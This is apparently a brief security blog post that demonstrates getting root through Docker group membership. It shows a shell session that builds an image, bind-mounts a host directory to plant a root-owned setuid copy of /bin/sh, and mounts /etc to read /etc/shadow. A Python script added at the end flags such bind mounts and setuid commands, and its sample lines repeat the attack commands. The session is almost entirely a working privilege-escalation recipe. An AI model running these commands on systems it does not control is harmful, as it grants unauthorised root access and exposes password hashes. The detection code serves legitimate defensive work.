Getting Root with Docker

September 20, 2016 • Security

The user must be a member of the docker group.

ek@victum:~/docker-test$ id  
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)

ek@victum:~$ mkdir docker-test  
ek@victum:~$ cd docker-test

ek@victum:~$ cat > Dockerfile << 'EOF'  
FROM debian:wheezy

ENV WORKDIR /stuff

RUN mkdir -p $WORKDIR

VOLUME [ $WORKDIR ]

WORKDIR $WORKDIR  
EOF

ek@victum:~$ docker build -t my-docker-image .  
ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \  
'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'  
./sh
whoami  
# root

ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow' 
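
A defender-side check for the two `docker run` invocations above, as an added example that is not part of the original post: it scans logged command lines for bind mounts of host paths and for setuid changes made from inside a container. The watch list, the finding strings and the sample lines (with `$PWD` expanded to an assumed `/home/ek/docker-test`) are constructed for illustration.

```python
import posixpath
import shlex
# Assumed watch list of host paths and chmod patterns; extend for your environment.
SENSITIVE = ("/etc", "/root", "/home", "/var/run/docker.sock")
SETUID_HINTS = ("chmod a+s", "chmod u+s", "chmod +s", "chmod 4")

def bind_sources(argv):
    """Host-side paths of -v/--volume/--mount options in a docker run argv."""
    out = []
    for i, arg in enumerate(argv):
        if arg in ("-v", "--volume", "--mount") and i + 1 < len(argv):
            kind, val = arg, argv[i + 1]
        elif arg.startswith(("--volume=", "--mount=")):
            kind, val = arg.split("=", 1)
        else:
            continue
        if kind == "--mount":  # type=bind,source=/etc,target=/stuff
            opts = dict(kv.split("=", 1) for kv in val.split(",") if "=" in kv)
            src = opts.get("source") or opts.get("src", "")
        else:  # host:container[:opts]; no colon means an anonymous volume
            src = val.split(":", 1)[0] if ":" in val else ""
        if src.startswith("/"):  # absolute path = bind mount, not a named volume
            out.append(posixpath.normpath(src))
    return out

def review(cmdline):
    """Return findings for one logged command line (empty list = nothing flagged)."""
    argv = shlex.split(cmdline)
    if argv[:2] != ["docker", "run"]:
        return []
    findings = []
    for src in bind_sources(argv):
        if src == "/" or any(src == p or src.startswith(p + "/") for p in SENSITIVE):
            findings.append("host path mounted: " + src)
    if any(h in a for a in argv for h in SETUID_HINTS):
        findings.append("setuid bit set from inside container")
    return findings

# Constructed sample lines, modelled on the session above with $PWD already expanded.
SAMPLES = [
    "docker run -v /home/ek/docker-test:/stuff -t my-docker-image /bin/sh -c "
    "'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'",
    "docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'",
    "docker run -v appdata:/stuff -t my-docker-image /bin/true",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(review(line) or "ok", "<-", line[:60])
```
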
Tags: docker, Root